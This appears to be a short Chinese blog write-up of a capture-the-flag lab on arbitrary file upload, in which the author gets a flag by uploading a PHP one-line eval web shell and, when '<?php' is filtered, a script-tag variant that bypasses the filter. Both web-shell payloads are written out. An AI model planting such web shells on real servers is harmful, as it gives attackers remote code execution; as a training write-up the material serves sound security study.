php一句话木马获取webshell

合天实验:第八周任意文件上传

题目:

想传什么就传什么,无所谓!
flag在/var/www/html/flag.php

看到是文件上传第一想到的是一句话木马:

<?php eval($_POST['ant']);?>

 

成功的把木马上传上去,,打开菜刀进行连接连接失败于是打开上传的php文件却发现php代码被过滤如图:

于是吧一句话木马改成:

<script language="pHp">@eval($_POST['123'])</script>

 

 在从新进行上传

 

 

题目提示flag在/var/www/html/flag.php 


所以

<?php
echo 'here_is_flag';
'flag{0123_4567_8901}';

 

 

 

posted @ 2020-05-22 17:01  beitso-admin  阅读(2539)  评论(0编辑  收藏  举报